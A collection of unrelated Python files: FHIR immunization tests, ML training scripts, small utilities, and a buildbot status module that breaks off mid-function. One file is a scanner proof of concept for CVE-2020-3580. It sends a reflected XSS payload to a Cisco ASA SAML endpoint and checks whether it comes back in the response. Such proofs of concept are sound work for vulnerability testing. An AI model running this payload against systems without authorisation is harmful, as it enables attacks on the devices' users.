assert inst.encounter.reference == "Encounter/example"
assert inst.expirationDate == fhirtypes.Date.validate("2015-02-15")
assert inst.explanation.reason[0].coding[0].code == "429060002"
assert inst.explanation.reason[0].coding[0].system == "http://snomed.info/sct"
assert inst.id == "example"
assert inst.identifier[0].system == "urn:ietf:rfc:3986"
assert inst.identifier[0].value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"
assert inst.location.reference == "Location/1"
assert inst.lotNumber == "AAJN11K"
assert inst.manufacturer.reference == "Organization/hl7"
assert inst.notGiven is False
assert inst.note[0].text == "Notes on adminstration of vaccine"
assert inst.patient.reference == "Patient/example"
assert inst.practitioner[0].actor.reference == "Practitioner/example"
assert inst.practitioner[0].role.coding[0].code == "OP"
assert inst.practitioner[0].role.coding[0].system == "http://hl7.org/fhir/v2/0443"
assert inst.practitioner[1].actor.reference == "Practitioner/example"
assert inst.practitioner[1].role.coding[0].code == "AP"
assert inst.practitioner[1].role.coding[0].system == "http://hl7.org/fhir/v2/0443"
assert inst.primarySource is True
assert inst.reaction[0].date == fhirtypes.DateTime.validate("2013-01-10")
assert inst.reaction[0].detail.reference == "Observation/example"
assert inst.reaction[0].reported is True
assert inst.route.coding[0].code == "IM"
assert inst.route.coding[0].display == "Injection, intramuscular"
assert inst.route.coding[0].system == "http://hl7.org/fhir/v3/RouteOfAdministration"
assert inst.site.coding[0].code == "LA"
assert inst.site.coding[0].display == "left arm"
assert inst.site.coding[0].system == "http://hl7.org/fhir/v3/ActSite"
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccinationProtocol[0].authority.reference == "Organization/hl7"
assert inst.vaccinationProtocol[0].description == "Vaccination Protocol Sequence 1"
assert inst.vaccinationProtocol[0].doseSequence == 1
assert inst.vaccinationProtocol[0].doseStatus.coding[0].code == "count"
assert inst.vaccinationProtocol[0].doseStatus.coding[0].display == "Counts"
assert (
inst.vaccinationProtocol[0].doseStatus.coding[0].system
== "http://hl7.org/fhir/vaccination-protocol-dose-status"
)
assert inst.vaccinationProtocol[0].doseStatusReason.coding[0].code == "coldchbrk"
assert (
inst.vaccinationProtocol[0].doseStatusReason.coding[0].display
== "Cold chain break"
)
assert (
inst.vaccinationProtocol[0].doseStatusReason.coding[0].system
== "http://hl7.org/fhir/vaccination-protocol-dose-status-reason"
)
assert inst.vaccinationProtocol[0].series == "Vaccination Series 1"
assert inst.vaccinationProtocol[0].seriesDoses == 2
assert inst.vaccinationProtocol[0].targetDisease[0].coding[0].code == "1857005"
assert (
inst.vaccinationProtocol[0].targetDisease[0].coding[0].system
== "http://snomed.info/sct"
)
assert inst.vaccineCode.coding[0].code == "FLUVAX"
assert inst.vaccineCode.coding[0].system == "urn:oid:1.2.36.1.2001.1005.17"
assert inst.vaccineCode.text == "Fluvax (Influenza)"
def test_immunization_1(base_settings):
"""No. 1 tests collection for Immunization.
Test File: immunization-example.json
"""
filename = base_settings["unittest_data_dir"] / "immunization-example.json"
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_immunization_1(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_immunization_1(inst2)
def impl_immunization_2(inst):
assert inst.date == fhirtypes.DateTime.validate("2012-01-15")
assert inst.id == "historical"
assert inst.identifier[0].system == "urn:ietf:rfc:3986"
assert inst.identifier[0].value == "urn:oid:1.3.6.1.4.1.21367.2005.3.7.1234"
assert inst.location.reference == "Location/1"
assert inst.notGiven is False
assert inst.note[0].text == "Notes on adminstration of a historical vaccine"
assert inst.patient.reference == "Patient/example"
assert inst.primarySource is False
assert inst.reportOrigin.coding[0].code == "record"
assert (
inst.reportOrigin.coding[0].system == "http://hl7.org/fhir/immunization-origin"
)
assert inst.reportOrigin.text == "Written Record"
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccineCode.coding[0].code == "GNFLU"
assert inst.vaccineCode.coding[0].system == "urn:oid:1.2.36.1.2001.1005.17"
assert inst.vaccineCode.text == "Influenza"
def test_immunization_2(base_settings):
"""No. 2 tests collection for Immunization.
Test File: immunization-example-historical.json
"""
filename = (
base_settings["unittest_data_dir"] / "immunization-example-historical.json"
)
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_immunization_2(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_immunization_2(inst2)
def impl_immunization_3(inst):
assert inst.date == fhirtypes.DateTime.validate("2013-01-10")
assert inst.explanation.reasonNotGiven[0].coding[0].code == "MEDPREC"
assert inst.explanation.reasonNotGiven[0].coding[0].display == "medical precaution"
assert (
inst.explanation.reasonNotGiven[0].coding[0].system
== "http://hl7.org/fhir/v3/ActReason"
)
assert inst.id == "notGiven"
assert inst.notGiven is True
assert inst.patient.reference == "Patient/example"
assert inst.primarySource is True
assert inst.status == "completed"
assert inst.text.status == "generated"
assert inst.vaccineCode.coding[0].code == "01"
assert inst.vaccineCode.coding[0].display == "DTP"
assert inst.vaccineCode.coding[0].system == "http://hl7.org/fhir/sid/cvx"
def test_immunization_3(base_settings):
"""No. 3 tests collection for Immunization.
Test File: immunization-example-refused.json
"""
filename = base_settings["unittest_data_dir"] / "immunization-example-refused.json"
inst = immunization.Immunization.parse_file(
filename, content_type="application/json", encoding="utf-8"
)
assert "Immunization" == inst.resource_type
impl_immunization_3(inst)
# testing reverse by generating data from itself and create again.
data = inst.dict()
assert "Immunization" == data["resourceType"]
inst2 = immunization.Immunization(**data)
impl_immunization_3(inst2)
|
# Matplotlib plotting helpers.
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def graph_scatter(sdlabel,
xdata,
ydata,
ax,
mtitle = '',
xtitle = '',
ytitle = '',
color = 'b',
xlabel = True):
r""" Generic 1D plotting function for data
"""
ax.set_title(mtitle)
ax.set_ylabel(ytitle)
if xlabel: ax.set_xlabel(xtitle)
ax.scatter(xdata, ydata, color = color, label = sdlabel)
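# Minimal usage sketch (not part of the original module): draw noisy points with
# graph_scatter on a single Axes. The figure size and data below are illustrative only.
if __name__ == "__main__":
    fig, ax = plt.subplots(figsize=(6, 4))
    x = np.linspace(0.0, 1.0, 50)
    y = x + np.random.normal(scale=0.1, size=x.size)
    graph_scatter("noisy line", x, y, ax, mtitle="Demo", xtitle="x", ytitle="y", color="r")
    ax.legend()
    plt.show()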
|
from house_regresion.housing_data import load_housing_data
from sklearn.model_selection import train_test_split, StratifiedShuffleSplit
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import LabelBinarizer
from house_regresion.custom_transformer import CombinedAttributesAdder
from pandas import DataFrame
import numpy as np
# fetch_housing_data()
housing = load_housing_data()
train_set, test_set = train_test_split(housing, test_size=0.2, random_state=42)
# create an income category
housing['income-cat'] = np.ceil(housing['median_income'] / 1.5)
housing['income-cat'].where(housing['income-cat'] < 5, 5.0, inplace=True)
# create new categories
# housing['room_per_household'] = housing['total_rooms'] / housing['households']
# housing['bedroom_per_room'] = housing['total_bedrooms'] / housing['total_rooms']
# housing['population_per_household'] = housing['population'] / housing['households']
print(housing.keys())
# print(housing.values[:4])
attr_adder = CombinedAttributesAdder(add_bedrooms_per_room=False)
housing_added_attr = attr_adder.transform(housing.values)
# print(housing_added_attr)
# Replace missing values with the median value
imputer = SimpleImputer(strategy="median")
housing_num = housing.drop('ocean_proximity', axis=1)
imputer.fit(housing_num)
X = imputer.transform(housing_num)
# Back into pandas DataFrame from numpy array
housing_tr = DataFrame(X, columns=housing_num.columns)
# Convert ocean_proximity labels to numbers
# encoder = LabelEncoder()
housing_cat = housing['ocean_proximity']
# housing_cat_encoded = encoder.fit_transform(housing_cat)
# print(encoder.classes_)
# print(housing_cat_encoded)
# hot_encoder = OneHotEncoder()
# housing_cat_1hot = hot_encoder.fit_transform(housing_cat_encoded.reshape(-1, 1))
encoder = LabelBinarizer(sparse_output=True)
housing_cat_1hot = encoder.fit_transform(housing_cat)
print(housing_cat_1hot.toarray())
# print(imputer.statistics_[0])
# print(housing_num.median().values)
# print(housing['income-cat'].value_counts())
# print(housing['ocean_proximity'])
# Create a stratified split based on the income category
stratified_split = StratifiedShuffleSplit(n_splits=1, test_size=0.2, random_state=42)
strat_train = None
strat_test = None
for train_index, test_index in stratified_split.split(housing, housing['income-cat']):
strat_train = housing.loc[train_index]
strat_test = housing.loc[test_index]
for subset in (strat_train, strat_test):
    subset.drop(['income-cat'], axis=1, inplace=True)
# play_data = strat_train.copy()
# play_data.plot(kind='scatter', x='longitude', y='latitude', alpha=0.1)
# corr_matrix = housing.corr()
# print(corr_matrix['median_house_value'].sort_values(ascending=False))
# housing.plot(kind="scatter", x="longitude", y="latitude", alpha=0.4, s=housing["population"] / 100, label="population",
# c="median_house_value", cmap=plt.get_cmap("jet"), colorbar=True)
# plt.legend()
# plt.show()
# print(strat_train.describe().to_string())
# print(f'train: {len(train_set)}, test: {len(test_set)}')
# print(housing.info())
# housing.hist(bins=50, figsize=(25,15))
# plt.show()
# attributes = ["median_house_value", "median_income", "total_rooms", "housing_median_age"]
# scatter_matrix(housing[attributes], figsize=(12,8))
# plt.show()
|
# package imports
from dash import html
import dash_bootstrap_components as dbc
layout = dbc.Container(
[
html.Div(
dbc.Container(
[
html.H1(
[
html.I(className='fas fa-skull-crossbones'),
'404 Error',
html.I(className='fas fa-skull-crossbones')
],
className='display-3'
),
html.P(
'Page not found.',
className='lead',
),
html.Hr(className='my-2'),
html.P(
dbc.Button(
'Home',
color='primary',
href='/'
),
className='lead'
),
],
fluid=True,
className='py-3',
),
className='my-2 bg-light rounded-3',
)
]
)
|
#!venv/bin/python
from stt_api import app
import os
import requests
from tqdm import tqdm
if __name__ == "__main__":
for asr_model_type in app.config['ASR_MODELS']:
print("Checking if models exist.")
asr_model = app.config['ASR_MODELS'][asr_model_type]
model_path = f"{app.config['ASR_MODEL_FOLDER']}/{asr_model}.nemo"
if not os.path.exists(model_path):
URL = f"https://api.ngc.nvidia.com/v2/models/nvidia/nemo/{asr_model}/versions/1.6.0/files/{asr_model}.nemo"
print(f"Downloading missing model {asr_model} from {URL}")
response = requests.get(URL, stream=True)
block_size = 1024 * 1024
total_size_in_bytes = int(response.headers.get('content-length', 0))
total_chunks = 0
progress_bar = tqdm(total=total_size_in_bytes, unit='iB', unit_scale=True)
with open(model_path, 'wb') as of:
for chunk in response.iter_content(chunk_size=block_size):
if chunk:
progress_bar.update(len(chunk))
of.write(chunk)
app.run(host="0.0.0.0", debug=True)
|
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import json
import argparse
import torch
def add_parser_params(parser):
"""add argument to the parser"""
# checkpoint
parser.add_argument('--resume', type=str, default=None,
help='put the path to resuming file if needed')
parser.add_argument('--checkname', type=str, default=None,
help='the name of the checkpoint.')
parser.add_argument('--save_ckpt_steps', type=int, default=500,
help='save checkpoints per save_ckpt_steps')
parser.add_argument('--max_ckpt_nums', type=int, default=15,
help='the max numbers of checkpoints')
parser.add_argument('--model_dir', type=str, default='/home/zhaoshuai/models/deeplabv3_cbl_2/',
help='Base directory for the model.')
parser.add_argument('--output_dir', type=str, default='/home/zhaoshuai/models/deeplabv3_cbl_2/',
help='output directory of model.')
# base model and the network
parser.add_argument('--seg_model', type=str, default='deeplabv3',
choices=['deeplabv3', 'deeplabv3+', 'pspnet'],
help='The segmentation model.')
parser.add_argument('--backbone', type=str, default='resnet101',
choices=['resnet50', 'resnet101', 'resnet152',
'resnet50_beta', 'resnet101_beta', 'resnet152_beta'],
help='backbone name (default: resnet101)')
parser.add_argument('--out_stride', type=int, default=16,
help='network output stride (default: 16)')
# batch size and crop size
parser.add_argument('--batch_size', type=int, default=16, metavar='N',
help='input batch size for training (default: auto)')
parser.add_argument('--accumulation_steps', type=int, default=1, metavar='N',
help='Accumulation steps when calculate the gradients when training')
parser.add_argument('--test_batch_size', type=int, default=None, metavar='N',
help='input batch size for testing (default: auto)')
# dataset information
parser.add_argument('--dataset', type=str, default='pascal' ,
choices=['pascal', 'coco', 'cityscapes', 'camvid'],
help='dataset name (default: pascal)')
parser.add_argument('--train_split', type=str, default='train' ,
choices=['train', 'trainaug', 'trainval', 'val', 'test'],
help='training set name (default: train)')
parser.add_argument('--data_dir', type=str, default='/dataset',
help='Path to the directory containing the PASCAL VOC data.')
parser.add_argument('--use_sbd', action='store_true', default=False,
help='whether to use SBD dataset (default: True)')
parser.add_argument('--workers', type=int, default=8, metavar='N',
help='dataloader threads')
parser.add_argument('--base_size', type=int, default=513, help='base image size')
parser.add_argument('--crop_size', type=int, default=513, help='crop image size')
# batch normalization
parser.add_argument('--sync_bn', type=bool, default=None,
help='whether to use sync bn (default: auto)')
parser.add_argument('--freeze_bn', type=bool, default=False,
help='whether to freeze bn parameters (default: False)')
parser.add_argument('--bn_mom', type=float, default=0.1, metavar='M',
help='momentum (default: 0.1) for running mean and var of batch normalization')
# training hyper params
parser.add_argument('--epochs', type=int, default=46, metavar='N',
help='Number of training epochs: '
'For 30K iteration with batch size 6, train_epoch = 17.01 (= 30K * 6 / 10,582). '
'For 30K iteration with batch size 8, train_epoch = 22.68 (= 30K * 8 / 10,582). '
                        'For 30K iteration with batch size 10, train_epoch = 28.35 (= 30K * 10 / 10,582). '
'For 30K iteration with batch size 11, train_epoch = 31.19 (= 30K * 11 / 10,582). '
'For 30K iteration with batch size 12, train_epoch = 34.02 (= 30K * 12 / 10,582). '
'For 30K iteration with batch size 14, train_epoch = 39.69 (= 30K * 14 / 10,582). '
'For 30K iteration with batch size 15, train_epoch = 42.53 (= 30K * 15 / 10,582). '
'For 30K iteration with batch size 16, train_epoch = 45.36 (= 30K * 16 / 10,582).')
parser.add_argument('--start_epoch', type=int, default=0,
metavar='N', help='start epochs (default:0)')
parser.add_argument('--init_global_step', type=int, default=0,
help='Initial global step for controlling learning rate when fine-tuning model.')
parser.add_argument('--use_balanced_weights', action='store_true', default=False,
help='whether to use balanced weights (default: False)')
# optimizer params, such as learning rate
parser.add_argument('--init_lr', type=float, default=0.007,
help='learning rate (default: auto)')
parser.add_argument('--lr_multiplier', type=float, default=1.0,
help='Learning rate multiplier for the unpretrained model.')
parser.add_argument('--slow_start_lr', type=float, default=1e-4,
help='Learning rate employed during slow start.')
parser.add_argument('--slow_start_steps', type=int, default=0,
help='Training model with small learning rate for few steps.')
parser.add_argument('--lr_scheduler', type=str, default='poly',
choices=['poly', 'step', 'cos'],
help='lr scheduler mode: (default: poly)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='momentum (default: 0.9)')
parser.add_argument('--weight_decay', type=float, default=1e-4,
metavar='M', help='w-decay (default: 1e-4)')
parser.add_argument('--nesterov', action='store_true', default=False,
help='whether use nesterov (default: False)')
# cuda, seed and logging
parser.add_argument('--no_cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--gpu_ids', type=str, default='0',
help='use which gpu to train, must be a comma-separated list of integers only (default=0)')
parser.add_argument('--main_gpu', type=int, default=0,
help='The main gpu')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
# finetuning pre-trained models
parser.add_argument('--ft', action='store_true', default=False,
help='finetuning on a different dataset')
# evaluation option
parser.add_argument('--eval_interval', type=int, default=2,
                        help='evaluation interval (default: 2)')
parser.add_argument('--no_val', action='store_true', default=False,
help='skip validation during training')
# loss type
parser.add_argument('--loss_type', type=int, default=0,
help='The loss type used.')
parser.add_argument('--loss_weight_lambda', type=float, default=0.5,
                        help='The relative weight factor for the loss.')
# process info
parser.add_argument('--proc_name', type=str, default='DeepLabv3',
help='The name of the process.')
# region mutual information
parser.add_argument('--rmi_pool_way', type=int, default=1,
help="The pool way when calculate RMI loss, 1 - avg pool, 0 - max pool")
parser.add_argument('--rmi_pool_size', type=int, default=2,
help="The pool size of the pool operation before calculate RMI loss")
parser.add_argument('--rmi_pool_stride', type=int, default=2,
help="The pool stride of the pool operation before calculate RMI loss")
parser.add_argument('--rmi_radius', type=int, default=3,
help="The square radius of rmi [1, 3, 5, 7], they have a center")
# CRF iter steps
parser.add_argument('--crf_iter_steps', type=int, default=1,
help='The iter steps of the crf')
    # torch.nn.parallel.DistributedDataParallel(), not available now.
parser.add_argument('--local_rank', type=int, default=0)
parser.add_argument('--world_size', default=-1, type=int, help='number of nodes for distributed training')
parser.add_argument('--dist_backend', default='nccl', type=str, help='distributed backend')
parser.add_argument('--multiprocessing_distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
# parse
args, unparsed = parser.parse_known_args()
# RMI parameters
args.rmi_pool_stride = args.rmi_pool_size
# use gpu or not
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
try:
args.gpu_ids = [int(s) for s in args.gpu_ids.split(',')]
args.gpu_ids = [i for i in range(0, len(args.gpu_ids))]
except ValueError:
raise ValueError('Argument --gpu_ids must be a comma-separated list of integers only')
# We only have one node and N GPUs.
args.world_size = int(len(args.gpu_ids))
    # distributed parallel or not
args.distributed = args.world_size > 1 or args.multiprocessing_distributed
# use synchronized batch normalization across multi gpus, or not
if args.sync_bn is None:
args.sync_bn = True if (args.cuda and len(args.gpu_ids) > 1) else False
# default settings for epochs, batch_size and lr
if args.epochs is None:
epoches = {
'coco': 30,
'cityscapes': 200,
'pascal': 46,
}
args.epochs = epoches[args.dataset.lower()]
# train batch size
assert args.accumulation_steps in [1, 2, 4]
assert args.batch_size in [4, 8, 12, 16, 32, 36, 48, 64]
args.batch_size = args.batch_size // args.accumulation_steps
# test batch size
if args.test_batch_size is None:
args.test_batch_size = args.batch_size
# learning rate
if args.init_lr is None:
lrs = {
'coco': 0.1,
'cityscapes': 0.01,
'pascal': 0.007,
}
args.init_lr = lrs[args.dataset.lower()] / (4 * len(args.gpu_ids)) * args.batch_size
# checkpoint name
if args.checkname is None:
args.checkname = str(args.seg_model) + str(args.backbone)
# some default parameters to ensure the justice of the experiments.
if args.backbone in ['resnet101']:
args.weight_decay = 1e-4
args.bn_mom = 0.05
if args.seg_model == 'deeplabv3':
# the default setting for deeplabv3
args.lr_multiplier = 10.0
elif args.seg_model == 'deeplabv3+':
# the default setting for deeplabv3+
args.lr_multiplier = 5.0
elif args.seg_model == 'pspnet':
# the default setting for pspnet
args.lr_multiplier = 10.0
else:
raise NotImplementedError
else:
args.weight_decay = 4e-5
args.bn_mom = 0.0003
    # dataset related parameters
if 'pascal' in args.dataset:
args.slow_start_steps = 1500
elif 'cityscapes' in args.dataset:
args.slow_start_steps = 3000
elif 'camvid' in args.dataset:
args.slow_start_steps = 300
args.init_lr = 0.025
args.lr_multiplier = 10.0
else:
raise NotImplementedError
return args
def save_hp_to_json(args):
"""Save hyperparameters to a json file
"""
if args.freeze_bn is False:
filename = os.path.join(args.model_dir, 'hparams01.json')
else:
filename = os.path.join(args.model_dir, 'hparams02.json')
#hparams = FLAGS.flag_values_dict()
hparams = vars(args)
with open(filename, 'w') as f:
json.dump(hparams, f, indent=4, sort_keys=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="PyTorch Segmentation Model Training")
args = add_parser_params(parser)
print(args)
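# Illustrative invocation of this config module (the script name and paths are
# placeholders, not project defaults):
#   python <train_script>.py --seg_model deeplabv3 --backbone resnet101 \
#       --dataset pascal --train_split trainaug --batch_size 16 --gpu_ids 0,1 \
#       --data_dir /path/to/VOCdevkit --model_dir /path/to/checkpoints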
|
import argparse
import pkg_resources
from argparse import Namespace
def get_package_templates():
models = {}
for entry_point in pkg_resources.iter_entry_points('stratus_package_templates'):
models[entry_point.name] = entry_point.load()
return models
class PackageTemplate(object):
def __init__(self):
self.parser = None
self.subcommand = None
self.opts = Namespace()
self.args = []
def configure_parser(self, action):
self.parser = argparse.ArgumentParser()
subparsers = self.parser.add_subparsers(help='template commands', dest='template')
customizer = getattr(self, f"customize_parser_{action}", lambda x: x)
self.subcommand = subparsers.add_parser(action)
customizer(self.parser)
def run_parser(self, args):
self.opts = self.parser.parse_args(args)
|
"""
Chef Two and Chef Ten are playing a game with a number X.
In one turn, they can multiply X by 2. The goal of the game is to make X divisible by 10.
Help the Chefs find the smallest number of turns necessary to win the game
(it may be possible to win in zero turns) or determine that it is impossible.
Input
The first line of the input contains a single integer T denoting the number of test cases. The description of T test cases follows.
The first and only line of each test case contains a single integer denoting the initial value of X.
Output
For each test case, print a single line containing one integer — the minimum required number of turns or −1 if there is no way to win the game.
Constraints
1≤T≤1000
0≤X≤109
Subtasks
Subtask #1 (100 points): original constraints
Example Input
3
10
25
1
Example Output
0
1
-1
"""
# cook your dish here
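# Reasoning (follows from the statement above): doubling never adds a factor of 5,
# so X * 2**k can be divisible by 10 only if X is already divisible by 5.
# If X % 10 == 0 the answer is 0 turns; if X % 5 == 0 but X % 10 != 0, one doubling
# supplies the missing factor of 2; otherwise the game cannot be won (-1).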
x = int(input())
for i in range(x):
n = int(input())
if n % 10 ==0 :
print('0')
elif n%5 ==0 :
print('1')
else :
print('-1')
|
#
# Copyright 2016 The BigDL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Union, Dict, Any
import intel_extension_for_pytorch as ipex
import torch
import pytorch_lightning as pl
from pytorch_lightning.plugins import SingleDevicePlugin
from pytorch_lightning.accelerators.accelerator import Accelerator
from pytorch_lightning.plugins.training_type import TrainingTypePlugin
from pytorch_lightning.plugins.precision import PrecisionPlugin
from bigdl.nano.utils.log4Error import invalidInputError
_STEP_OUTPUT_TYPE = Union[torch.Tensor, Dict[str, Any]]
class IPEXAccelerator(Accelerator):
def __init__(
self,
training_type_plugin: TrainingTypePlugin = SingleDevicePlugin(
torch.device('cpu')),
enable_bf16=False,
) -> None:
"""
Args:
precision_plugin: the plugin to handle precision-specific parts
training_type_plugin: the plugin to handle different training routines
"""
self.enable_bf16 = enable_bf16
super().__init__(precision_plugin=PrecisionPlugin(),
training_type_plugin=training_type_plugin)
def setup(self, trainer: "pl.Trainer", model: "pl.LightningModule") -> None:
"""
Setup plugins for the trainer fit and creates optimizers.
Args:
trainer: the trainer instance
model: the LightningModule
"""
self.setup_training_type_plugin(model)
if not self.training_type_plugin.setup_optimizers_in_pre_dispatch:
self.setup_optimizers(trainer)
self.setup_precision_plugin()
if len(self.optimizers) > 1:
invalidInputError("IPEX does not support more than one optimizers.")
dtype = torch.bfloat16 if self.enable_bf16 else None
model, optimizer = ipex.optimize(model, optimizer=self.optimizers[0],
inplace=True, dtype=dtype)
self.optimizers = [optimizer]
|
from wsgiref.simple_server import make_server
payload = b"d" * 1024 * 1024  # 1 MiB body of 'd'; bytes (as WSGI requires) and no shadowing of the builtin
def req(environ, start_response):
start_response('200 OK', [])
    yield payload
server = make_server('localhost', 8000, req)
server.serve_forever()
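# Usage note: running this module starts a blocking, single-threaded dev server on
# http://localhost:8000/ that streams a 1 MiB body per request; wsgiref's make_server
# is intended for local testing only.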
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
This module contains common function for FARS parsers
"""
def value_by_mapping(value, year, mapping):
if value == -1:
return 'UNKNOWN'
default = mapping['default']
all_keys = mapping.keys()
all_keys.remove('default')
all_keys.sort()
from_year = 0
for i in xrange(0, len(all_keys)):
if year >= all_keys[i]:
from_year = all_keys[i]
if from_year == 0:
return 'UNKNOWN'
branch = mapping[from_year]
if value in branch:
return branch[value]
else:
return default
def get_int(list_row, index):
return int(get_float(list_row, index))
def get_float(list_row, index):
if index < 0 or index > len(list_row) - 1:
return -1.0
if list_row[index] == '.':
return -1.0
else:
return float(list_row[index])
def get_str(list_row, index):
if index < 0 or index > len(list_row) - 1:
return 'UNKNOWN'
else:
return list_row[index]
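# Illustrative example for value_by_mapping (hypothetical mapping, not actual FARS codes):
#     mapping = {'default': 'OTHER', 1990: {1: 'CAR'}, 2000: {1: 'PASSENGER CAR'}}
#     value_by_mapping(1, 1995, mapping)   # -> 'CAR'   (latest year key <= 1995 is 1990)
#     value_by_mapping(1, 2005, mapping)   # -> 'PASSENGER CAR'
#     value_by_mapping(9, 2005, mapping)   # -> 'OTHER' (falls back to 'default')
#     value_by_mapping(-1, 2005, mapping)  # -> 'UNKNOWN'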
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Cisco ASA XSS''',
"description": '''Multiple vulnerabilities in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the web services interface of an affected device. The vulnerabilities are due to insufficient validation of user-supplied input by the web services interface of an affected device. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive, browser-based information. Note: These vulnerabilities affect only specific AnyConnect and WebVPN configurations. For more information, see the Vulnerable Products section.''',
"severity": "medium",
"references": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-3580",
"https://twitter.com/ptswarm/status/1408050644460650502"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"cvss-score": "",
"cve-id": "CVE-2020-3580",
"cwe-id": "CWE-79"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2020", "xss", "cisco"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/+CSCOE+/saml/sp/acs?tgname=a"""
method = "POST"
data = """SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E"""
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if ("""<svg/onload=alert(/{{randstr}}/)>""" in resp0.text) and (resp0.status_code == 200) and ("""text/html""" in str(resp0.headers)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
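# Illustrative usage (the target URL is a placeholder):
#     result = poc("https://target.example.com")
#     print(result.get("success"), result.get("payload"))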
|
"""
Status information for the CI infrastructure, for use by the dashboard.
"""
import threading
import time
import traceback
import StringIO
from llvmlab import util
import buildbot.statusclient
class BuildStatus(util.simple_repr_mixin):
@staticmethod
def fromdata(data):
version = data['version']
if version not in (0, 1):
raise ValueError, "Unknown version"
if version == 0:
slave = None
else:
slave = data['slave']
return BuildStatus(data['name'], data['number'], data['source_stamp'],
data['result'], data['start_time'], data['end_time'],
slave)
def todata(self):
return { 'version' : 1,
'name' : self.name,
'number' : self.number,
'source_stamp' : self.source_stamp,
'result' : self.result,
'start_time' : self.start_time,
'end_time' : self.end_time,
'slave' : self.slave }
def __init__(self, name, number, source_stamp,
result, start_time, end_time, slave):
self.name = name
self.number = number
self.source_stamp = source_stamp
self.result = result
self.start_time = start_time
self.end_time = end_time
self.slave = slave
class StatusMonitor(threading.Thread):
def __init__(self, app, status):
threading.Thread.__init__(self)
self.daemon = True
self.app = app
self.status = status
def run(self):
while 1:
try:
self.read_events()
except:
# Log this failure.
os = StringIO.StringIO()
print >>os, "*** ERROR: failure in buildbot monitor"
print >>os, "\n-- Traceback --"
traceback.print_exc(file = os)
self.app.logger.error(os.getvalue())
# Sleep for a while, then restart.
time.sleep(60)
def read_events(self):
# Constantly read events from the status client.
while 1:
for event in self.status.statusclient.pull_events():
# Log the event (for debugging).
self.status.event_log.append((time.time(), event))
self.status.event_log = self.status.event_log[-100:]
kind = event[0]
if kind == 'added_builder':
name = event[1]
if name not in self.status.builders:
self.status.builders[name] = []
self.status.build_map[name] = {}
elif kind == 'removed_builder':
name = event[1]
if name in self.status.builders:
self.status.builders.pop(name)
self.status.build_map.pop(name)
elif kind == 'reset_builder':
name = event[1]
self.status.builders[name] = []
self.status.build_map[name] = {}
elif kind == 'invalid_build':
_,name,id = event
build = self.status.build_map[name].get(id)
if build is not None:
self.status.builders[name].remove(build)
self.status.build_map[name].pop(id)
elif kind in ('add_build', 'completed_build'):
_,name,id = event
build = self.status.build_map[name].get(id)
add_build = False
if build is None:
add_build = True
build = BuildStatus(name, id, None, None, None, None,
None)
# Get the build information.
try:
res = self.status.statusclient.get_json_result((
'builders', name, 'builds', str(build.number)))
except:
res = None
if res:
build.result = res['results']
if 'sourceStamps' in res:
build.source_stamp = res['sourceStamps'][0]['revision']
else:
build.source_stamp = res['sourceStamp']['revision']
build.start_time = res['times'][0]
build.end_time = res['times'][1]
build.slave = res['slave']
if add_build:
# Add to the builds list, maintaining order.
self.status.build_map[name][id] = build
builds = self.status.builders[name]
builds.append(build)
if (len(builds) > 1 and
build.number < builds[-2].number):
builds.sort(key = lambda b: b.number)
else:
self.app.logger.warning("unknown event '%r'" % (event,))
# FIXME: Don't save this frequently, we really just want to
# checkpoint and make sure we save on restart.
self.app.save_status()
time.sleep(.1)
class Status(util.simple_repr_mixin):
@staticmethod
def fromdata(data):
version = data['version']
if version != 0:
raise ValueError, "Unknown version"
sc = data.get('statusclient')
if sc:
sc = buildbot.statusclient.StatusClient.fromdata(sc)
return Status(data['master_url'],
